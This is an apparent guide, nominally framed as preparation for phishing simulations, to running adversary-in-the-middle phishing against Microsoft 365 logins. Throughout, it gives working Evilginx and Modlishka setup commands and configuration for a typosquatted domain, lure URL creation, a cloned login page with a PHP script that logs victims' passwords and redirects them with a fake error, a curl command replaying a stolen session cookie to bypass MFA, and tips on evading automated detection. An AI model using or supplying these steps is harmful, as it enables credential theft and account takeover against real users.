Adaptive Data Harvesting Techniques Leveraged in Phishing Campaigns

“`html

Introduction

The landscape of phishing has evolved significantly from basic credential harvesting to more sophisticated methods. In this evolution, adaptive data harvesting techniques have become increasingly prevalent. This shift focuses not only on capturing static credentials like usernames and passwords but has grown to include session tokens and cookies that have already passed multi-factor authentication (MFA) checks. Such methods offer a higher success rate as they allow attackers to gain authenticated access without triggering additional security prompts or alarms. Understanding these advanced techniques is crucial for running more authentic and successful phishing simulations.

After going through this comprehensive guide, you’ll be equipped to set up and execute an Adversary-in-the-Middle (AiTM) proxy campaign using tools like Evilginx. You’ll learn how to create convincing cloned login pages and implement strategies for the exfiltration of session tokens that provide immediate and validated account access, bypassing the need for MFA. Ready to take your phishing simulations to the next level? Let’s dive in.

Prerequisites and Setup

Before you can undertake an effective credential capture operation, certain prerequisites need to be in place. The first is to secure a plausible-looking domain to act as a facade for your operation. Typosquatting on a known service provider is a classic technique. For instance, the domain accounts-microsoft-verify.com can mimic Microsoft’s services, providing a credible veneer. Additionally, having SSL via Certbot to encrypt your fake site traffic is vital. Also, ensure that you have access to a VPS where you can install and run Evilginx.

To set up Evilginx on a fresh Debian VPS, use the following commands:


apt update && apt install git golang-go -y

git clone https://github.com/kgretzky/evilginx2.git

cd evilginx2 && make

./bin/evilginx -p ./phishlets

After installation, configure Evilginx using its shell as follows:


config domain accounts-microsoft-verify.com

config ipv4 external 45.33.32.156

phishlets hostname o365 login.accounts-microsoft-verify.com

phishlets enable o365

With the basic setup in place, you’re prepared to execute a robust phishing campaign.

Step-by-Step Execution — AiTM Proxy with Evilginx

Configuring the phishlet

The first step in running an Evilginx AiTM campaign is configuring the right phishlet. Phishlets are templates for cloned login pages and can be customized for various services. The O365 phishlet serves as a fitting example, given its widespread use:

Creating and distributing lure URLs

Creating the lure URL is a pivotal step. This URL is what your targets will click on, thinking it’s a legitimate login page. Use the following Evilginx commands to create and retrieve your lure URL:


lures create o365

lures edit 0 redirect_url https://portal.office.com

lures get-url 0

The retrieved URL can be distributed through various means like spear-phishing emails or crafted messages that are more likely to result in a click-through.

Harvesting captured sessions

Once victims log in through the lure URL, Evilginx captures their session tokens. Here’s a sample of a captured session output in the Evilginx interface:

Token: XYZ123… | Username: john.doe@company.com | Timestamp: 2023-10-15 12:00:00

The value in this data is substantial because a session token allows you to impersonate the user without needing the password. This method completely sidesteps MFA requirements since the user has already been authenticated. Such tokens are a potent asset for an attacker, maximizing access while minimizing detection risk.

Step-by-Step Execution — Cloned Credential Pages

Cloning the target page

Sometimes a standalone credential harvester page is more practical. The first step is cloning the target login page. Using

wget

, you can mirror the target’s legitimate login page:


wget --mirror --page-requisites --convert-links --no-parent https://login.microsoftonline.com/common/oauth2/authorize

This will fetch all necessary files to locally host a believable copy of the real login page.

Adding the credential capture backend

Once the page is cloned, incorporate a backend script to capture credentials. An example PHP script for logging credentials is as follows:


&lt;?php

$log = fopen('/var/log/.harvest.log', 'a');

fwrite($log, date('Y-m-d H:i:s') . ' | ' . $_SERVER['REMOTE_ADDR'] . ' | ' . $_POST['login'] . ':' . $_POST['passwd'] . "\n");

fclose($log);

header('Location: https://login.microsoftonline.com/common/oauth2/authorize?error=invalid_request');

exit;

The strategy here uses a redirect to the legitimate site after capturing credentials, with a generic error message suggesting to the user they simply mistyped their login details. This redirection decreases suspicion, allowing users to input their details again on the real site, while your script quietly logs their credentials.

Advanced Variations

Modlishka as a Modular AiTM Alternative

If Evilginx doesn’t fit the specific needs of your campaign, Modlishka presents a modular alternative with more customization options. Configuring Modlishka involves creating a JSON configuration file matching your target:


{

  "proxyDomain": "login.microsoftonline-sso.com",

  "listeningAddress": "0.0.0.0:443",

  "target": "login.microsoftonline.com",

  "targetResources": ".microsoftonline.com,.live.com,.office.com",

  "trackingCookie": "id",

  "log": "/var/log/modlishka.log",

  "cert": "/etc/letsencrypt/live/login.microsoftonline-sso.com/fullchain.pem",

  "certKey": "/etc/letsencrypt/live/login.microsoftonline-sso.com/privkey.pem"

}

Session Token Replay

Once a session token is captured, you can directly replay it to gain access to the victim’s account, bypassing password and MFA. To verify the authenticity of a token, use:


curl -s -b "ESTSAUTH=eyJ0eXAiOiJKV1Qi..." \

  https://outlook.office.com/mail/ -L \

  | grep -i "displayName"

This method lets you test the token’s validity before proceeding with further stages of your campaign.

Good / Better / Best

Good: Implementing a static cloned page with a PHP credential logger is a functional approach. However, its effectiveness diminishes rapidly after the domain is reported and blacklisted. The prompt response teams of major service providers can quickly neutralize such sites.

Better: Deploying an Evilginx AiTM configuration elevates your game. This method not only captures credentials but also session tokens, bypassing MFA obstacles entirely. The setup can blend seamlessly with real web services, making detection considerably harder.

Best: Incorporating a pre-text traffic-qualifying mechanism adds another layer of sophistication. This entails redirecting traffic to a legitimate-seeming page first to filter out bots and scanners, allowing only human interactions to reach your Evilginx capture page. This pre-text strategy dramatically extends the operational lifespan of the domain by reducing exposure to automated detection systems.

Related Concepts

Adaptive data harvesting techniques are intricately linked to other areas in the phishing landscape. Concepts like AiTM phishing and session hijacking form the basis of such sophisticated campaigns. Additionally, strategies around payload delivery, command and control infrastructure, and proficient campaign management, including domain rotation, are essential for extending the reach and lifespan of these engagements.